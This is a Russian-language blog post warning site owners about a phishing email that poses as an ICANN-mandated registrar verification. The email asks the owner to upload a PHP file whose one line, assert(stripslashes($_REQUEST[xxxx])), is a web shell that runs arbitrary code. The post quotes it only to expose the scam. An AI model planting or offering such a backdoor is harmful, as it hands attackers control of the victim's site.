Взлом сайта при помощи команды assert

В сегодняшней статье разберем взлом сайта при помощи команды assert в PHP

Мне пришло письмо от регистратора следующего содержания:

Уважаемый клиент!

В соответствии с изменениями, внесенными в правила ICANN, необходимо подтвердить, что фактическое управление доменом pro-gram.ru осуществляется лицом, указанным в качестве его администратора.

Чтобы подтвердить, что Вы имеете возможность управлять доменом, создайте в корневой директории сайта файл 98y6d1fq15165d74.php со следующим содержимым:

<?php
assert(stripslashes($_REQUEST[xxxx]));
?>

Файл должен быть создан в течение трех рабочих дней с момента получения настоящего сообщения и находиться на сервере до 1 мая 2018 года, 13:00 (UTC+03:00), в противном случае верификация не будет пройдена.

Уведомляем Вас о том, что если процедура верификации не будет пройдена, обслуживание доменного имени будет завершено.

Для тех, кто не помнит PHP наизусть: assert() исполняет строку, поданную на вход.

Говоря простым языком — это попытка, так называемого детского взлома вашего сайта. И что немаловажно, Вы сами помогаете взломать ваш сайт.

Рекомендации:

  1. Не будьте наивными
  2. Если не знаете язык PHP используйте всемирную паутину чтобы узнать, что вам советуют внедрить на Ваш сайт
  3. При покупке домена ничего не надо делегировать и никакой регистратор не сможет отключить ваш домен до истечения его срока.

 

Взлом сайта при помощи команды assert
4.8 (95%) 4 votes

Оставить комментарий

Ваш e-mail не будет опубликован. Обязательные поля помечены *